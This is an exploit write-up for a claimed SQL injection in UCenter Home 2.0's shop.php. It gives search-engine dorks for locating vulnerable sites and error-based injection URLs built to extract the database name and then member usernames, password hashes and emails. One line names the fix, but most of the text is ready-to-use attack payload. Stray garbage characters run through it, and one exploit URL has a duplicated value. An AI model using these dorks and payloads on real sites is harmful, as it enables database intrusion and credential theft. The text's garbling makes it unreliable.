__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
3 h; q: L. x3 i# P8 X' T. I; H4 s
' A; M) {! M, I' v; `+ z: T9 ?1 L : c" v3 G, N' [, a" A7 X
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
) `& P5 y: K3 Y. z6 e" |3 y) D4 p& \1 F q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 W' d# s% R0 e) M
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
$ G8 c$ |! X R6 N( v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + R, ~+ F/ E3 u) R
# R+ u. g9 I' ZDork : Powered by UCenter inurl:shop.php?ac=view ( ~8 s, x& Y% l. |) i- `( S% ?3 T
* o# A6 R2 b$ k1 g/ [" {) BDork 2 : inurl:shop.php?ac=view&shopid= 1 d0 H( Z! M; [( s& M( o
+ j7 K4 V( k2 y9 I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 e' @& e f$ T5 z2 g
Vuln file : Shop.php

Parameters : (?)ac=view&shopid=

Vulnerability type : SQL Injection (MySQL Error Based). The shopid value evidently reaches the MySQL query without integer validation or parameter binding; casting it to an integer or binding it as a query parameter closes this injection point.

Required materials : Hex Conversion
# }2 g" W4 }6 z
8 e" l) ~# i9 ~2 I, ]: ~__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 ?5 [# U( q( k
You need the victim database name.
( T. i: Y3 [# V
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 : n8 m5 e1 K }7 B6 R
# ]: t3 B# e! ^: I* ]" x..
: A( j9 K; z$ R% {. E# {" l" c6 U' \9 x* Q+ F. q, t6 t; p( ]
DB : Okay.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, then edit your SQL injection exploit.
3 u; B3 T8 |: f& z3 r4 K! C6 P& k: T
8 ?( }. s/ A& g3 o$ }
) H: W" y& V; y2 aExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 / k" X9 }. d4 N4 W% n8 S4 A
|